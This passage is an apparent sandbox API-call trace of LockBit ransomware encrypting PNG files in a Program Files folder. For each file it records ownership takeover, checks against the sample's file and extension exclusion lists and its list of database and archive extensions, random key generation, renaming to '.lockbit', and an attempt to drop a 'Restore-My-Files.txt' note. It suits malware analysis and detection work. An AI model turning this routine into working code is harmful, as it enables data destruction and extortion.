(_Size=0x200) returned 0x3db00b8 [0091.766] NtQueryInformationToken (in: TokenHandle=0x1198, TokenInformationClass=0x1, TokenInformation=0x3db00b8, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x3db00b8, ReturnLength=0x3d6acd8) returned 0x0 [0091.766] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.766] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x3db00c0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.766] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.767] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.767] CloseHandle (hObject=0x1198) returned 1 [0091.767] free (_Block=0x3db00b8) [0091.767] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1198 [0091.767] CreateIoCompletionPort (FileHandle=0x1198, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.767] malloc (_Size=0x40068) returned 0x3db00b8 [0091.770] GetFileSizeEx (in: hFile=0x1198, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=6440) returned 1 [0091.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0091.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0091.775] ReadFile (in: hFile=0x1198, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0091.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.788] malloc (_Size=0xb6) returned 0x2071008 [0091.788] NtSetInformationFile (FileHandle=0x1198, IoStatusBlock=0x3d6aa8c, FileInformation=0x2071008, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0091.789] free (_Block=0x2071008) [0091.789] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0091.789] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0091.789] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.790] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x544241af, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0091.790] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0091.790] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0091.790] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0091.790] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.790] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.790] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.791] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.791] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.791] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.791] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.791] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.792] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.792] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="thumbs.db", lpString2="15x15dot.png") returned 1 [0091.793] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0091.793] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0091.793] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png") returned=".png" [0091.793] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.793] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.793] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.793] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.794] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.794] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.794] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.lockbit") returned 74 [0091.794] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.797] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.798] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.798] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.800] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.801] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.801] RtlFreeAnsiString (AnsiString="\\") [0091.801] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0091.801] malloc (_Size=0x200) returned 0x2071008 [0091.801] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.802] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.802] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.802] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.802] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.803] CloseHandle (hObject=0x1194) returned 1 [0091.803] free (_Block=0x2071008) [0091.803] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0091.803] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.803] malloc (_Size=0x40068) returned 0x1ff1e60 [0091.803] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2821) returned 1 [0091.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0091.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0091.808] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0091.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.821] malloc (_Size=0xaa) returned 0x2071008 [0091.821] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x2071008, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0091.822] free (_Block=0x2071008) [0091.822] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0091.822] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0091.822] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.823] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0091.823] lstrcmpiW (lpString1=".", lpString2="720x480icongraphic.png") returned -1 [0091.823] lstrcmpiW (lpString1="..", lpString2="720x480icongraphic.png") returned -1 [0091.823] PathFindExtensionW (pszPath="720x480icongraphic.png") returned=".png" [0091.823] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.823] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.823] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.824] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.824] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.825] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.825] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.825] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.825] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="ntldr", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="bootsect.bak", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="autorun.inf", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="thumbs.db", lpString2="720x480icongraphic.png") returned 1 [0091.825] lstrcmpiW (lpString1="iconcache.db", lpString2="720x480icongraphic.png") returned 1 [0091.825] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0091.825] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png") returned=".png" [0091.825] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.825] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.826] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.826] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.826] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.826] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.826] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.826] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.827] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.827] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.827] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.827] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.lockbit") returned 84 [0091.827] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.831] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.832] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.833] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.834] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.835] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.835] RtlFreeAnsiString (AnsiString="\\") [0091.835] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x119c) returned 0x0 [0091.835] malloc (_Size=0x200) returned 0x2071008 [0091.835] NtQueryInformationToken (in: TokenHandle=0x119c, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.836] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.836] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.836] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.837] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.837] CloseHandle (hObject=0x119c) returned 1 [0091.837] free (_Block=0x2071008) [0091.837] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x119c [0091.837] CreateIoCompletionPort (FileHandle=0x119c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.837] malloc (_Size=0x40068) returned 0x3df0128 [0091.840] GetFileSizeEx (in: hFile=0x119c, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=5620) returned 1 [0091.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.843] GetProcAddress 